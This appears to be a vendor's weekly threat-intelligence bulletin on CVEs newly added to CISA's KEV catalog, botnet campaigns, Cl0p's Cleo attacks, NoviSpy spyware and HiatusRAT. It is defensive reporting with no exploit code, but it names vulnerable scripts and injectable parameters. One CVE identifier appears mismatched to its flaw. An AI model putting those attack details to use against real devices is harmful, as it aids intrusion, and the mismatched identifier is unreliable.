This week saw the addition of eightvulnerabilities to the CISA Known Exploited Vulnerabilities (KEV) catalog,spotlighting a mix of new and legacy threats. Microsoft faced scrutiny with acritical flaw in its Windows Kernel-mode driver, while Adobe ColdFusion alsosaw a high-severity vulnerability added. BeyondTrust joined the list with asignificant entry, underscoring the diverse attack surface. Cleo remains underpressure with another vulnerability added to the catalog following last week’sentry. Additionally, the catalog now includes two legacy OS command injectionvulnerabilities in Reolink IP cameras and two more in NUUO NVRmini devices, emphasizingthe risk posed by unresolved legacy issues.

The surge in botnet activity has takena sharp turn, with Zerobot launching attacks on Tenda WiFi routers and Andoryuexploiting vulnerabilities in GitLab systems. IoT Reaper and AndroxGh0St remainrelentless, preying on outdated flaws in Cisco routers and PHP Unit. Adding tothe wave of exploits, veteran botnets Mirai, Tsunami, Brickerbot, and Bashlitehave zeroed in on an eight-year-old vulnerability in the Eir D1000 modem,underscoring the risks posed by legacy security gaps in critical infrastructure.

Ransomware and threat activity surgedthis week, with Cl0p ransomware operators claiming responsibility for attackson Cleo products, showcasing their ongoing impact. The discovery of NoviSpyspyware leveraging Qualcomm zero-day vulnerabilities further highlights thesophistication of emerging threats. Additionally, the FBI issued a starkwarning about HiatusRAT campaigns, which have evolved to target IoT devices,signaling a broader expansion in attack vectors.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-32520

A vulnerability in the Microsoft Windows Kernel-mode Driver, involving an untrusted pointer dereference, poses a significant threat by allowing attackers to execute malicious code with elevated system privileges upon successful exploitation. With a high CVSS score of 7.8, this vulnerability was disclosed and patched by Microsoft in June security advisory. While the vendor provided limited details at that time, the subsequent release of proof-of-concept (PoC) exploit has amplified the risk, making it easier for attackers to leverage this vulnerability. The flaw's critical nature led to its inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency of mitigation efforts.

CVE-2024-20767

An improper access control vulnerability in Adobe ColdFusion, with a CVSS score of 7.4, allows attackers to access or modify restricted files, potentially exposing sensitive information. This high-severity flaw affects versions 2023.6, 2021.12, and earlier. The vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting its critical nature. Additionally, the availability of a Proof of Concept (PoC) exploit further increases the risk, making it crucial for organizations to apply patches and mitigate the threat promptly.  

CVE-2024-55956

A critical vulnerability, with a CVSS Score of 9.8, has been identified in Cleo Harmony, VLTrader and Lexicom, affecting versions prior to 5.8.0.24. This flaw allows unauthenticated users to import and execute arbitrary Bash or PowerShell commands on the host system, posing a severe risk of system compromise. Due to its high impact, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog recently.  

CVE-2024-12356

A command injection vulnerability rated critical (CVSS 9.8) has been identified in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products, impacting versions 24.3.1 and earlier. This vulnerability, now added to the CISA Known Exploited Vulnerabilities (KEV) catalog, enables attackers to execute arbitrary commands, significantly escalating risks to affected systems.  

CVE-2022-23227

A missing authentication vulnerability in NUUO NVRmini 2 devices (versions through 3.11) allows unauthenticated attackers to upload an encrypted TAR archive, which can be exploited to add arbitrary users due to the lack of authentication in the handle_import_user.php function. When chained with another vulnerability (CVE-2011-5325), attackers can overwrite arbitrary files under the web root, ultimately achieving code execution with root privileges. This critical flaw has been recently added to the CISA KEV catalog, highlighting the urgent need for mitigation to prevent exploitation.

CVE-2021-40407

A critical OS command injection vulnerability in Reolink RLC-410W IP cameras (version 3.0.0.136_20121102) has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. With a CVSS Score of 9.8, this flaw allows attackers to exploit the network settings functionality through crafted HTTP requests, posing a severe security risk. Immediate updates are essential to mitigate this critical threat.

CVE-2019-11001

Added recently to the CISA Known Exploited Vulnerabilities (KEV) catalog, this five-year-old OS command injection vulnerability impacts multiple Reolink IP camera models, including RLC-410W, C1 Pro, C2 Pro, RLC-422W and RLC-511W. This flaw allows an authenticated administrator to exploit the "TestEmail" functionality to inject and execute OS commands with root-level access.  

CVE-2018-14933

Recently added to the CISA Known Exploited Vulnerabilities (KEV) catalog, a six-year-old OS command injection vulnerability in NUUO NVRmini devices allows remote code execution. Having a CVSS Score of 9.8, this flaw exists in the upgrade_handle.php script, where shell metacharacters in the uploaddir parameter of the writeuploaddir command can be exploited.  This vulnerability underscores the importance of reviewing and securing legacy devices to mitigate critical security risks.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identifiedvulnerabilities exploited by botnets, including recent CVEs logged in Misp.Presenting the top 5 CVEs with payloads suggestive of botnet activities, likeutilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-55956

SecurityWeek confirmed that ClOp representatives have claimed responsibility for the recent attacks on Cleo products. Initially, the attacks were attributed to a new ransomware group called Termite, with some cybersecurity experts speculating a possible link between Termite and ClOp, potentially positioning Termite as ClOp's successor. However, Rapid7 researchers have noted that it is still possible that multiple threat groups were involved in the attacks.

‍NoviSpy Spyware leveraging Qualcomm Zero-day vulnerabilities

The Serbian government has been linked to the exploitation of Qualcomm zero-day vulnerabilities to deploy a new spyware, dubbed 'NoviSpy,' targeting activists, journalists, and protestors. Discovered by Amnesty International's Security Lab on a journalist's phone after it was returned by the police, NoviSpy appears to have been used by Serbian authorities based on its communication patterns. Researchers shared exploit artifacts with Google’s Threat Analysis Group (TAG), which identified vulnerabilities in Qualcomm's DSP (Digital Signal Processor) driver, specifically 'adsprpc,' used for multimedia processing. While Google has not confirmed the exact vulnerabilities exploited, evidence indicates that NoviSpy employs an exploit chain to bypass Android security mechanisms and achieve persistent kernel-level installation.

‍HiatusRAT Exploiting Web Cameras and DVRs

The FBI has issued a warning about HiatusRAT campaigns expanding their scope beyond outdated network edge devices, such as routers, to target Internet of Things (IoT) devices from manufacturers like Hikvision, D-Link, and Dahua. These campaigns have been observed in regions including the U.S., Australia, Canada, New Zealand, and the United Kingdom. HiatusRAT, a Remote Access Trojan (RAT) active since at least July 2022, enables malicious actors to remotely take control of targeted devices. Initially focused on network edge devices, the latest iterations of HiatusRAT demonstrate a broader and more aggressive approach, emphasizing the need for enhanced IoT security measures.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/12/17/cisa-adds-one-known-exploited-vulnerability-catalog
2. https://www.cisa.gov/news-events/alerts/2024/12/16/cisa-adds-two-known-exploited-vulnerabilities-catalog
3. https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog
4. https://www.cisa.gov/news-events/alerts/2024/12/18/cisa-adds-four-known-exploited-vulnerabilities-catalog  
5. https://vulnera.com/newswire/serbian-government-linked-to-novispy-spyware-exploiting-qualcomm-zero-day-vulnerabilities/  
6. https://securitylab.amnesty.org/latest/2024/12/a-digital-prison-surveillance-and-the-suppression-of-civil-society-in-serbia/
7. https://www.bleepingcomputer.com/news/security/new-android-novispy-spyware-linked-to-qualcomm-zero-day-bugs/  
8. https://thehackernews.com/2024/12/novispy-spyware-installed-on.html?m=1  
9. https://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html  
10. https://www.ic3.gov/CSA/2024/241216.pdf